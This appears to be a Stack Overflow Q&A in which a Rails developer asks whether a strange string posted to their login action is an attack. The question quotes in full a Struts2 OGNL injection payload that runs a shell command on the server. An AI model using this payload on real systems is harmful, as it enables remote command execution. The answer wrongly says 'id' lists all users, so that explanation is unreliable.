# Weird post string on login action; hack attempt?

Tags: java, ruby-on-rails, security

Our Ruby on Rails app hosted on Heroku has been throwing weird 'unknown format' errors. After inspecting what is happening it appears someone/something is trying to post this string to our login action:

```
/login.action?redirect:$%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String[]%7B%27sh%27,%27-c%27,%27id%27%7D)).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char[50000],%23d.read(%23e),%23matt=%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D=
```

Is this a hack attempt? And if it is, should I be worried? I ran the post command myself (using curl) but got nothing..

Answer (score 2):

Looking at `new%20java.lang.String[]%7B%27sh%27,%27-c%27,%27id%27%7D)` it will list all the users in the machine.
Since it's java and you are running a ruby application I doubt if any java will be installed on Heroku dynos.
To be on the safe side you can sanitize inputs ref: [Best way to go about sanitizing user input in rails](https://stackoverflow.com/questions/21886170/best-way-to-go-about-sanitizing-user-input-in-rails)